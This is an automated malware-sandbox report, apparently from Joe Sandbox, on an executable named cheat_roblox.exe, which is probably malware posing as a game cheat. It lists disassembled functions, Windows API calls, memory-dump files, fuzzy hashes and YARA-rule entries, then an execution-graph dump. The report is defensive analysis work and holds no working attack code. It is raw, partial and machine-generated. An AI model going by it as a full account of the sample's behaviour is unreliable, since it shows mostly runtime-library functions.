                                                                              • Instruction Fuzzy Hash: 5741AE62F24B5684FB10CF75E8861AC3379FB44BA8B005276DF5DA6AA9DF38D441C300
                                                                              Function 00007FF693E90B78 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF693E8C45B), ref: 00007FF693E90B91
                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF693E8C45B), ref: 00007FF693E90BF3
                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF693E8C45B), ref: 00007FF693E90C2D
                                                                              • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF693E8C45B), ref: 00007FF693E90C57
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                              • String ID:
                                                                              • API String ID: 1557788787-0
                                                                              • Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                              • Instruction ID: 57a6530d355999049891ab35ef5b3cbd0dcbcd6de4b14554c9668e17db028b4c
                                                                              • Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                              • Instruction Fuzzy Hash: 78218531F18B5581E6749F12A441029B6A9FB98FE0B484176DE8EB3BA4DF3CEC528304
                                                                              Function 00007FF693E8D440 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$abort
                                                                              • String ID:
                                                                              • API String ID: 1447195878-0
                                                                              • Opcode ID: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                                              • Instruction ID: 33d65579f59cab5d95f8819d2c0df3bdfaff2a385edd030a064e47790234fcb2
                                                                              • Opcode Fuzzy Hash: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                                              • Instruction Fuzzy Hash: 91017110F0D70B43FA787B31A65727E52A9DF44BA0F0445BAD91EE27E6ED2CF8158200
                                                                              Function 00007FF693E78590 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDevice$Release
                                                                              • String ID:
                                                                              • API String ID: 1035833867-0
                                                                              • Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                              • Instruction ID: 72177c7642c161e17e65be6b86abd01d73ca25c9b220ce1fa2469f5785b36dd5
                                                                              • Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                              • Instruction Fuzzy Hash: BAE0ED60E0970682FF6A5BB2B85B13621A4EF88741F0844BBD81FAA750DD3CE4858614
                                                                              Function 00007FF693E5E34C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID: DXGIDebug.dll
                                                                              • API String ID: 3668304517-540382549
                                                                              • Opcode ID: 542befb6cfa6d10c523847148554f6d067076e635e2560feee388be7f8acc3cf
                                                                              • Instruction ID: 476778f52e235df942f4993e73ac394805ef9e3fe3942e962b8c6fd7b65e3dc2
                                                                              • Opcode Fuzzy Hash: 542befb6cfa6d10c523847148554f6d067076e635e2560feee388be7f8acc3cf
                                                                              • Instruction Fuzzy Hash: 0E71AC72A14B8586EB24CF25E8453ADB3A8FB54798F044236DFAD97B95DF78E061C300
                                                                              Function 00007FF693E8E1F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo
                                                                              • String ID: e+000$gfff
                                                                              • API String ID: 3215553584-3030954782
                                                                              • Opcode ID: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                              • Instruction ID: abc09ca7b36b8c861971888944972d42a58ae05b9b7e8d1b9b589e28a9f0d7c2
                                                                              • Opcode Fuzzy Hash: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                              • Instruction Fuzzy Hash: 21510562F187C586E7358F39994236D6B99EB81B90F0892B2DA9CD7BD5CF2CE444C700
                                                                              Function 00007FF693E69408 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                              • String ID: SIZE
                                                                              • API String ID: 449872665-3243624926
                                                                              • Opcode ID: a0d5e285fbaa1ac9608f05ebcc1ead8385210100eac4b181d702dbb234701be4
                                                                              • Instruction ID: 91e1359291f12fa4a78fcb8318c8c5a999874a744af4cb23c4bef4143a027497
                                                                              • Opcode Fuzzy Hash: a0d5e285fbaa1ac9608f05ebcc1ead8385210100eac4b181d702dbb234701be4
                                                                              • Instruction Fuzzy Hash: 1A41C262E1868285EE20DB24E4523BD7365FF85794F504273FB9D966D6EE3CE580C700
                                                                              Function 00007FF693E8C2C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: FileModuleName_invalid_parameter_noinfo
                                                                              • String ID: C:\Users\user\Desktop\cheat_roblox.exe
                                                                              • API String ID: 3307058713-3708674124
                                                                              • Opcode ID: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                                              • Instruction ID: 6a3b096fdaa47580e87790448cc70e4a6fb342b24cf9e38ae51b3f3fb5091f80
                                                                              • Opcode Fuzzy Hash: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                                              • Instruction Fuzzy Hash: 59419336E08B568AE725DF25A4421BDB7ACEF457D4B4440B3E94EA7B55DE3CE442C300
                                                                              Function 00007FF693E79B40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Item$Text$Dialog
                                                                              • String ID: ASKNEXTVOL
                                                                              • API String ID: 2638039312-3402441367
                                                                              • Opcode ID: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
                                                                              • Instruction ID: e8753d0689cba286fbefb59bea8cd3e54c557d8cd2da7b80ab4e3bf58b9e2977
                                                                              • Opcode Fuzzy Hash: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
                                                                              • Instruction Fuzzy Hash: D7418722F0868281FE749B16E5561B927A9EF86BC4F140077EE4EF7796CE3DE4418340
                                                                              Function 00007FF693E69638 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide_snwprintf
                                                                              • String ID: $%s$@%s
                                                                              • API String ID: 2650857296-834177443
                                                                              • Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                                              • Instruction ID: fcda584fb2586f79436601e316ed56639fbb1459db7412fa883d6e9af6e2f0dc
                                                                              • Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                                              • Instruction Fuzzy Hash: FD31C0B2B18A4A85EB708F66E4426E933A9FB44788F401073EF0DA7795EE3CE505C700
                                                                              Function 00007FF693E8EB04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: FileHandleType
                                                                              • String ID: @
                                                                              • API String ID: 3000768030-2766056989
                                                                              • Opcode ID: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                                              • Instruction ID: c04c985d8b33e44460c6e9d92d1e85d234f52738b755f14e3a620a8a26d78a28
                                                                              • Opcode Fuzzy Hash: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                                              • Instruction Fuzzy Hash: 6C21B922F09B8241EB708B2D98911792659EBC5774F280377E66FA77D4DE3DE881C301
                                                                              Function 00007FF693E84078 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF693E81D3E), ref: 00007FF693E840BC
                                                                              • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF693E81D3E), ref: 00007FF693E84102
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFileHeaderRaise
                                                                              • String ID: csm
                                                                              • API String ID: 2573137834-1018135373
                                                                              • Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                                              • Instruction ID: 5e3543b0f2bf7a3712097c2d4622fca66af6f84b4a22ce3e26fba9884e908da3
                                                                              • Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                                              • Instruction Fuzzy Hash: 06114F32A08B4582EB218F15E44026A77E5FB88B94F184272DF8D57764DF3CD955CB00
                                                                              Function 00007FF693E6EA5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF693E6E95F,?,?,?,00007FF693E6463A,?,?,?), ref: 00007FF693E6EA63
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF693E6E95F,?,?,?,00007FF693E6463A,?,?,?), ref: 00007FF693E6EA6E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastObjectSingleWait
                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                              • API String ID: 1211598281-2248577382
                                                                              • Opcode ID: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                                              • Instruction ID: 2d0ae11ea31ce23becfd9e19f8042790f85c51cbea3b14c4e987759caca48fe8
                                                                              • Opcode Fuzzy Hash: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                                              • Instruction Fuzzy Hash: 02E04865E1590341F9305B22AC435782259FF90770F9043B3D03EE11F19F6CAD49C300
                                                                              Function 00007FF693E6A43C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: FindHandleModuleResource
                                                                              • String ID: RTL
                                                                              • API String ID: 3537982541-834975271
                                                                              • Opcode ID: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                              • Instruction ID: 167f1f7e1d0900a88f52998c24ce04ea46379dc114d5b7b63f5f844b0fc8b664
                                                                              • Opcode Fuzzy Hash: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                              • Instruction Fuzzy Hash: 58D05E91F0960682FF394FB2A84A3342364DF18B41F4850BAC90E963A0EE2CE898C751

                                                                              Execution Graph

                                                                              Execution Coverage:21.3%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:2.1%
                                                                              Total number of Nodes:481
                                                                              Total number of Limit Nodes:7
                                                                              execution_graph 1387 1236350 1388 123636e 1387->1388 1401 1236310 1388->1401 1390 123641d 1391 12363ee 1391->1390 1393 1236310 _ValidateLocalCookies 5 API calls 1391->1393 1392 123638c ___except_validate_context_record 1392->1390 1392->1391 1398 123642a __IsNonwritableInCurrentImage 1392->1398 1393->1390 1394 123dfd0 RtlUnwind 1395 1236477 1394->1395 1396 1236310 _ValidateLocalCookies 5 API calls 1395->1396 1397 123649d 1396->1397 1399 12431dc 14 API calls 1397->1399 1400 12364c5 1397->1400 1398->1394 1399->1400 1402 1236322 1401->1402 1403 123632f 1401->1403 1405 1232f6a 1402->1405 1406 1232f73 IsProcessorFeaturePresent 1405->1406 1407 1232f72 1405->1407 1409 1232fb5 1406->1409 1407->1403 1412 1232f78 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 1409->1412 1411 1233098 1411->1403 1412->1411 1974 1232820 1977 12334e2 1974->1977 1976 1232825 1976->1976 1978 12334f8 1977->1978 1980 1233501 1978->1980 1981 1233495 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 1978->1981 1980->1976 1981->1980 1413 124443f 1414 124444b ___free_lconv_mon 1413->1414 1415 1244452 GetLastError ExitThread 1414->1415 1416 124445f 1414->1416 1427 125a1c5 GetLastError 1416->1427 1418 1244464 1477 125d0f8 1418->1477 1421 124447b 1482 124461e 1421->1482 1428 125a1e1 1427->1428 1429 125a1db 1427->1429 1433 125a1e5 SetLastError 1428->1433 1488 125cd5a 1428->1488 1500 125cd1b 1429->1500 1437 125a275 1433->1437 1438 125a27a 1433->1438 1437->1418 1516 124462c 1438->1516 1440 125a22b 1442 125cd5a ___free_lconv_mon 6 API calls 1440->1442 1441 125a21a 1444 125cd5a ___free_lconv_mon 6 API calls 1441->1444 1445 125a237 1442->1445 1443 125a27f 1449 125cd1b ___free_lconv_mon 6 API calls 1443->1449 1452 125a291 1443->1452 1446 125a228 1444->1446 1447 125a252 1445->1447 1448 125a23b 1445->1448 1505 125a4b0 1446->1505 1511 1259ff3 1447->1511 1451 125cd5a ___free_lconv_mon 6 API calls 1448->1451 1449->1452 1450 125cd5a ___free_lconv_mon 6 API calls 1455 125a2ab 1450->1455 1451->1446 1452->1450 1456 125a297 1452->1456 1455->1456 1461 125b99b ___free_lconv_mon 14 API calls 1455->1461 1458 124462c 43 API calls 1456->1458 1459 125a29c 1456->1459 1462 125a315 1458->1462 1459->1418 1460 125a4b0 ___free_lconv_mon 14 API calls 1460->1433 1463 125a2bb 1461->1463 1464 125a2c3 1463->1464 1465 125a2d8 1463->1465 1466 125cd5a ___free_lconv_mon 6 API calls 1464->1466 1467 125cd5a ___free_lconv_mon 6 API calls 1465->1467 1468 125a2cf 1466->1468 1469 125a2e4 1467->1469 1472 125a4b0 ___free_lconv_mon 14 API calls 1468->1472 1470 125a2f7 1469->1470 1471 125a2e8 1469->1471 1474 1259ff3 ___free_lconv_mon 14 API calls 1470->1474 1473 125cd5a ___free_lconv_mon 6 API calls 1471->1473 1472->1456 1473->1468 1475 125a302 1474->1475 1476 125a4b0 ___free_lconv_mon 14 API calls 1475->1476 1476->1459 1478 125d10a GetPEB 1477->1478 1480 124446f 1477->1480 1479 125d11d 1478->1479 1478->1480 1959 125cb8d 1479->1959 1480->1421 1485 125d003 1480->1485 1962 12444f4 1482->1962 1484 124462b 1486 125caca ___free_lconv_mon 5 API calls 1485->1486 1487 125d01f 1486->1487 1487->1421 1528 125caca 1488->1528 1491 125cd94 TlsSetValue 1492 125a1fd 1492->1433 1493 125b99b 1492->1493 1498 125b9a8 ___free_lconv_mon 1493->1498 1494 125b9e8 1546 123e672 1494->1546 1495 125b9d3 RtlAllocateHeap 1496 125a212 1495->1496 1495->1498 1496->1440 1496->1441 1498->1494 1498->1495 1543 12625ed 1498->1543 1501 125caca ___free_lconv_mon 5 API calls 1500->1501 1502 125cd37 1501->1502 1503 125cd40 1502->1503 1504 125cd52 TlsGetValue 1502->1504 1503->1428 1506 125a4e5 1505->1506 1507 125a4bb RtlFreeHeap 1505->1507 1506->1433 1507->1506 1508 125a4d0 GetLastError 1507->1508 1509 125a4dd ___free_lconv_mon 1508->1509 1510 123e672 ___free_lconv_mon 12 API calls 1509->1510 1510->1506 1583 1259e87 1511->1583 1725 1253980 1516->1725 1519 124463c 1520 1244646 IsProcessorFeaturePresent 1519->1520 1521 1244665 1519->1521 1523 1244652 1520->1523 1776 125447d 1521->1776 1770 123e378 1523->1770 1527 12446a9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 1527->1443 1529 125caf8 1528->1529 1533 125caf4 1528->1533 1529->1533 1535 125c9ff 1529->1535 1532 125cb12 GetProcAddress 1532->1533 1534 125cb22 ___free_lconv_mon 1532->1534 1533->1491 1533->1492 1534->1533 1536 125ca10 ___free_lconv_mon 